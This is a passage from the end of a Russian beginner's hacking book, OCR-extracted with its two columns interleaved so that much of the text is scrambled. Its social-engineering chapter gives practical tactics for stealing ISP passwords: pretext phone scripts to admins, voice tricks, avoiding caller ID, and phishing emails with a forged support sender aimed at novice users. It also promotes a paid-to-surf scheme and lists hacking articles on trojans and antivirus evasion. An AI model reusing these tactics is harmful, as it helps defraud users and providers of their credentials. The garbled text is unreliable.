определяющих моду на определённый вид ни в чём не уступающая Legion’у, а может
взлома. даже превосходящая его.
Ни для кого не секрет, что хакеры, Потом наступила эра scriptkiddie.
если им надо, пишут для своих целей свои Изобилие инфы cgi
bugs на хакерских
программы. Но есть добрые дяди, которые сайтах и сканеров cgi
скриптов привели к
стараются это дело донести и до тотальному сканированию и
остальных. Вы наверняка помните Legion. использованию этих самых багов
Эта программа подключалась к огромным количеством лиц. Первый из
расшаренным ресурсам машины. При сканеров дырявых cgi был Voideye. Затем
удачном выборе диапазона IP вы вскоре появился более удачный, на мой взгляд,
найдете открытые для доступа сетевые Damned CGI Scanner 2.1. Это была просто
диски, а затем выбираете любой ресурс и революция. Любой, кому не лень, юзал её,
жмёте Map Drive. Мне кажется, что проще а затем шёл на void.ru и читал инфу об
некуда. Это программа стала чрезвычайно обнаруженных багах. Быстрому

203 204
Хакинг с самого начала Хакинг с самого начала

распространению этого вида атак О социальной инженерии


способствовала её относительная простота
и многочисленные разъяснительно
Социальная инженерия — это целый
просветительные статьи в Internet. Многие раздел «хакерства». В этой части хакерства
после таких опытов смогли уже сами применяются психологические методы для
пробовать обнаружить разные дыры в сбора нужной хакеру информации и
чатах, форумах, формах, используя знания применении её для проведения операций
о cgi. по выполнению итоговой задачи — скажем
кража пароля или сбор информации о
Кстати, ещё одним условием
личных данных пользователя (номер
популярности какого
либо хака является
кредитной карты). Целей много. В данном
ОС. Что говорить, но очень многие не
случае в качестве итоговой задачи мы
имеют возможности атаковать серверы,
поставим кражу пароля для входа в
используя эксплоиты, т.к. у них просто

Internet. Хотя это может быть и


напросто не имеется подходящей ОС.
ступенькой к выполнению более сложной
Почти все эксплоиты написаны на Си и
задачи.
компилируются под Линукс или Юникс.
Но сейчас это дело быстро меняется. Представим, что есть пользователь, в
дальнейшем юзер, есть системный
Сейчас программы, сходной по
администратор провайдера
популярности DCS 2.1 и Essential Tools, я
«Инетфордолларс», в дальнейшем админ.
пока не вижу. Вижу я пока то, что в
Всё вроде бы правильно: чтобы узнать
последнее время набирает обороты
пароль (методом социальной инженерии)
программа Xavior для подбора пароля к
нам лишь нужно убедить админа, что
серваку и мылу. Очень даже удачная
хакер — юзверь провайдера
программа. Я думаю, что она будет иметь
«Инетфордолларс» и предпринять
такой же эффект.
действия, которые бы заставили админа
сообщить пароль. Или сделать
наоборот — убедить юзверя, что хакер —
админ и д.т.к.в.п.п.

205 206
Хакинг с самого начала Хакинг с самого начала

Рассмотрим 1й случай. Самый постарается решить проблему


простой способ — это позвонить админу и побыстрее, предоставя доступ.
сказать, что ты юзер этого самого
■ Вариант назойливости —
провайдера и попросить напомнить
грузило. То есть хакер грузит
пароль, т.к. ты его забыл, бумажку потерял
админа о особенностях его
и т.п. Когда ты используешь этот метод,
модема и компа.
ты всегда рискуешь — АОНы стоят везде.
На успех данной операции могут повлиять ■ Звонить лучше не из дома.
следующие детали: ■ Звонить в конце рабочего дня
■ Админу приятней, если звонит — админ уже будет
не 13
летний пацан, а девушка готовенький.
с симпатичным голосом, так ■ Придумайте особенную
что в некоторых случаях
причину по которой админ
придётся взять в дело твою
должен вам сказать пароль,
подружку. Или используй
выделить доступ или вообще
какой
нибудь преобразователь
что
нибудь сделать. Например,
голоса. Это существенно
очень хороший способ:
повысит шансы на успех.
–Алло, это провайдер
■ Вежливость — оружие вора,
«Инетфордолларс»?
постарайся придерживаться
официального стиля и —Да, здравствуйте, чем я могу
прикидываться дурачком в помочь?
компьютерных делах. –Ваш провайдер выбран нами по
■ Иногда помогает назойливость советам наших партнёров. Мы — фирма
— админу надоедают «Факадминс» хотели бы через час войти во
бесконечные вопросы и он всемирную глобальную сеть Internet через
вашего провайдера для проверки связи и
связаться с нашими партнёрами. Нам

207 208
Хакинг с самого начала Хакинг с самого начала

нужен, если это вам под силу, бесплатный аккаунта, сообщении пароля, т.к. админ
доступ на 6 часов. располагает возможностями для
вычисления хакера, даже если он
–Через час?
пользовался ремейлером. Во время своего
–Такая спешка объясняется звонка, даже если имеется АОН, ты
ограничением во времени, которое нам можешь отвлечь админа и отбить желание
дал совет директоров. Мы оперативно тебя вычислить — и это зависит от твоего
связываемся с 40 Московскими мастерства.
провайдерами. Ваш — один из них, по
Следующий способ для определения
истечении проверки мы примем решение
пароля к логину. Представьте, звонит
и выберем окончательно. Вы в состоянии
девушка, в конце рабочего дня, и
оперативно предоставить доступ?
прикидывается лохушкой.
–Да конечно!
–Алло, это администратор?
На этом примере (может и
–Да, чем я могу помочь?
неумелом) наглядно показано, как для
собственной успешности провайдер –У вас там нигде не записано как
выделяет доступ солидной (только по зовут мою собачку?
видимости) фирме. Будет просто отлично
–Не понял???
если админу позвонит девушка с
приятным голосом. Но правда админ будет –Ну у вас на сайте есть такая штука
удивлён, зачем фирме — Диал
Ап, а не для тех кто забыл пароль. Я там ввела имя
выделенка. И ещё совет, если у тебя есть моей собачки, её зовут Фифи. А потом
друзья, занимающиеся подобного рода пароль забыла. Зашла на ваш сайт. И
звонками, то расспроси у них, у каких ввожу имя моей собаки: «ФИФИ»,
провайдеров админы более дырявые на «Фифи», «фифи», «ФиФи» — ничего не
предмет социнженерии. помогает.
По электронной почте лучше не –Ладно, ладно я всё понял. Какое
посылать админам просьбы о выдаче имя пользователя?

209 210
Хакинг с самого начала Хакинг с самого начала

–То есть??? 1. Есть пользователи, которые


тщательно проверяют от кого пришло
–Ну логин.
письмо. Постарайтесь позаботиться о
–Ах, да. Логин — hacker. своей анонимности.
–Записывайте пароль — 31337. 2. Письмо надо посылать по
Запомнили? электронному адресу, который
предоставил пользователю провайдер, а не
–Да! Спасибо вам большое.
полученный на халявном мэйл
сервисе.
–До свидания.
3. Необходимо завести себе
почтовый адрес, похожий на адрес
Нам просто был известен чей
то техподдержки провайдера, чтобы
логин и мы узнали пароль. На первый пользователь убедился, что письмо
взгляд — всё просто, но не все админы — пришло от провайдера. Например, есть
лохи. И не на каждом сайте есть такая провайдер «Inetfordollars», значит
штука для тех кто забыл пароль. обратный адрес пользователь увидит вроде
такого «inetfordollars@mail.ru», но это
2й случай. Когда хакер притворяется конечно же редко помогает.
админом и выуживает пароли у простого
пользователя. Для этого хакеру надо 4. Вам будет гораздо легче обмануть
убедить пользователя, что хакер — админ пользователя, если попытаетесь послать
провайдера, которым он пользуется. анонимный e
mail через telnet или с
Телефон в данном случае помогает редко, помощью специальных программ, в
потому что никто из админов не звонит обратном адресе указав настоящий
прямо пользователю по телефону и это почтовый адрес техподдержки провайдера.
станет подозрительным. Чаще всего это Например, если адрес службы
делается по электронной почте. На успех техподдержки имеет вид
данной операции могут повлиять support@inetfordollars.ru, то и в анонимном
некоторые обстоятельства. письме должно быть указано:
support@inetfordollars.ru.

211 212
Хакинг с самого начала Хакинг с самого начала

5. Ещё лучше, если вы знаете пароль серфингом (а так называется заработок в


к почтовому аккаунту техподдержки сети) многие люди зарабатывают себе на
провайдера, но такое счастье с неба не жизнь и довольно неплохо. Если вы
падает. начинающий в этом деле, то занимаясь
серфингом вы, по крайней мере, сможете
6. В самом письме постарайтесь
оплатить свой доступ в Internet. В
сформулировать текст в официально

дальнейшем, когда вы немного разберетесь


деловом стиле.
в этом способе заработка, вы сможете
7. Закрепите письмо ссылкой на сайт заработать неплохие деньги!
провайдера.
Мы расскажем вам, как сделать ваш
Замечу, что такая техника кражи заработок более значительным.
паролей применяется давно, не
Речь пойдет об американской
натыкайтесь на тех, кто на этом собаку
компании Spedia! В данный момент эта
съел. Лучше провернуть такое дельце с
самая доходная спонсорская компания,
неопытным пользователем, который
которая реально платит около 0.60$ в час
недавно в Internet.
за то, что вы просто держите внизу экрана
их программу, которая показывает
Все о Spedia рекламные баннеры. Вы скажете, «За что
же тут платить деньги?», отвечаем — в
Эта глава для тех, кто устал от настоящее время рекламная индустрия
скитаний по Internet в поисках настолько разрослась и буржуйские
действительно легкой халявы. Неважно, конторы готовы платить огромные деньги
есть у вас своя страничка или нет, есть за эту самую рекламу. Internet становится
анлимитед у вас или нет, наше одним из основных средств общения и
предложение универсально. получения информации и вы, быть может,
Все описанное ниже вы можете сами не замечая того, становитесь
воспринимать как нереальное и потребителем этой рекламы. Надеемся,
недостижимое, это ваше право, но вам стало ясно, за что они платят деньги?

213 214
Хакинг с самого начала Хакинг с самого начала

Spedia — один из самых надежных вас — 25% от его дохода;


спонсоров в сети, и в настоящий момент,
■ За то, что вы играете на их
самый доходный. Около 2 млн.
сайте в игры типа «Однорукого
пользователей зарегистрированы в этой
Бандита»;
программе и около 30 млн. $ эта компания
выплачивает своим клиентам. ■ Премиальные особо активным
пользователям.
Автор этих строк за последние два
месяца уже получил 300 долларов! Теперь Сразу после регистрации вам
подробнее о самой фирме: она платит Вам: предложат скачать их Spediabar, это
необходимо сразу же сделать, также вы
■ За то, что вы держите
можете загрузить эту программку, зайдя на
включенным компьютер,
вкладку Tools или на вкладку Make Money
подключенный к Internet, и
в меню Download. Эта программа нужна
внизу экрана находится их
непосредственно для зарабатывания денег.
небольшое, ничем не
мешающее, рекламное окошко Ну, все! Удачного хака!
— за
час — примерно 0.5 доллара;
■ За то, что вы иногда получаете
и читаете письма(e
mail) от их
спонсоров — цена зависит от
спонсора;
■ За то, что вы однократно
зарегистрируетесь у их
спонсоров, которых они вам
укажут;
■ За то, что вы сагитируете кого

нибудь зарегистрироваться под

215 216
Хакинг с самого начала Хакинг с самого начала

Список использованных zzone@avtograd.ru


http://cyberportal.narod.ru
материалов
Взломанный чат
Некоторые методы технического взлома Автор: tHe karamba
почтового ящика с WWW.интерфейсом (на
примере www.mail.ru) IP.tools
A.V. Komlin avkvladru@netscape.net Автор: Pupkin
Zade
http://ks
soft.mastak.com/users/kssoft/ip

Банкомат . всё очень просто tools.eng/index.htm


Крис Касперски (http://dore.on.ru/kpnc)
Что такое IPX и как его использовать в своих
Хакер из Шаровары целях
FINNAN (finnan@mail.ru) Автор: Егоров

Основы построения локальной сети Взлом мыла (user manual)


Автор: Choosen Автор: zLOB
http://zlob.bos.ru
Что можно делать с домашней сетью
Автор: Андрей
Паримся с MTC
Автор: Cfyz
Гадим с ANSI.SYS
Автор: Alexander Ermakov
Игры без CD или ломаем KERNEL32.DLL
Автор: Green Mouse
Как обойти AVP
Автор: ZaDNiCa
Поисковая машина как оружие хакера
Автор: Курт Сабо
Модифицируем троян или как обойти AVP
Автор: dr.golova http://www.emedia.ru/

*.BAT — мертв? *.BAT — Жив! Пишем простейший сканер портов


Автор: gaszZone Автор: Travelling Wind
http://rayon.promedia.minsk.by

217 218
Хакинг с самого начала Хакинг с самого начала

Взлом провайдера Убить ДЕМОНОВ!


Автор: Reanimator http://www.4prohack.cjb.net

Интервью с некоторыми провайдерами Безопасность Windows в Internet


Автор: zLOB Maxim V. Stepin. E
Mail: maxim.stepin@usa.net
http://www.zlob.net.ru/
Большому кораблю . большая торпеда
Учимся использовать Telnet Михаил Ромашов
Автор:
=Sky12dooR=

Материалы журнала «Хакер


Сделай своего трояна. Руководство по xa@xakep.ru
изготовлению вируса в домашних условиях
Безопасность Windows в Internet
Автор: Yarix; Андрей Каролик
Александр Авдуевский shura@osp.msk.su.
Приколы Windows
Краткий обзор DОS.атак для Windows.систем
Автор:
=BFG=

Максим Степин
Windows: скрытые фишки
Материалы сайта 4prohack
Автор: Epsilon
http://www.4prohack.cjb.net
Шифруемся Перевод
Дмитрий Громов dgro@chromo.lgu.spb.su
Автор: Анатолий Ремнев
Маленькие хитрости твоего мыла
Пагер — брат автоответчика Крис Касперски
MOOF (moof@xakep.ru; http://AnyNews.da.ru)
Как сделать сетевого раба из Windows
Материалы сайта Hacker Team GrayFlint
hacker team@mail.ru

Официальный FAQ конференции


relcom.fido.ru.hacker
angry_pooh@yahoo.com

219 220
Cодержание Cодержание

Содержание Как узнать пароли для Internet:


Взлом провайдера . . . . . . . . . . . . . . . . . . . . .175
Добывание паролей Internet у
провайдера с помощью программ . . . . . . . .180
Введение в хакинг Как проверить анонимность
proxy*server’а . . . . . . . . . . . . . . . . . . . . . . . . .181
Начинающему хакеру . . . . . . . . . . . . . . . . . . .3
Как хакнуть WWW*сервер . . . . . . . . . . . . . . . .183
Как же надо хакать и с чего начать? . . . . . .10
Подробности про вирус
Что такое exploit? . . . . . . . . . . . . . . . . . . . . . .28 VBS.LOVELETTER . . . . . . . . . . . . . . . . . . . . . . .186
Что такое root? . . . . . . . . . . . . . . . . . . . . . . . .30 Уроки по VBScript . . . . . . . . . . . . . . . . . . . . . .192
Убить «демонов»! . . . . . . . . . . . . . . . . . . . . . .38 Программы, которые изменили мир . . . . . . .202
Технология обрыва стэка . . . . . . . . . . . . . . . .49 О социальной инженерии . . . . . . . . . . . . . . .206
Охота за UIN’ом: Bugs, Crack и Social Все о Spedia . . . . . . . . . . . . . . . . . . . . . . . . . .213
Ingineering . . . . . . . . . . . . . . . . . . . . . . . . . . . .50
Список использованных материалов . . . . . .219
Взлом компьютера через Internet . . . . . . . . .62
Уроки сетевого хакинга для начинающих . . .78
Советы системному администратору . . . . . .116
Как получить доступ к удаленному
компьютеру . . . . . . . . . . . . . . . . . . . . . . . . . .134
Бесплатный Internet . . . . . . . . . . . . . . . . . . . .137
Чистим логи . . . . . . . . . . . . . . . . . . . . . . . . . .153
Сканирование shared*ресурсов в Internet . .157
Как через Internet подключиться к
другой Windows Me машине . . . . . . . . . . . . .165
Описание программы LEGION 2.1 . . . . . . . . .167
Распределенные вычисления . . . . . . . . . . . . .170

221 222
Для Ваших заметок

Научно популярное издание

Левин Максим
Хакинг с самого начала:
Методы и секреты

ООО «Литературное агентство «Бук


Пресс».
127591, Москва, Керамический пр., д. 53. кор. 1.
http://www.book
press.ru

223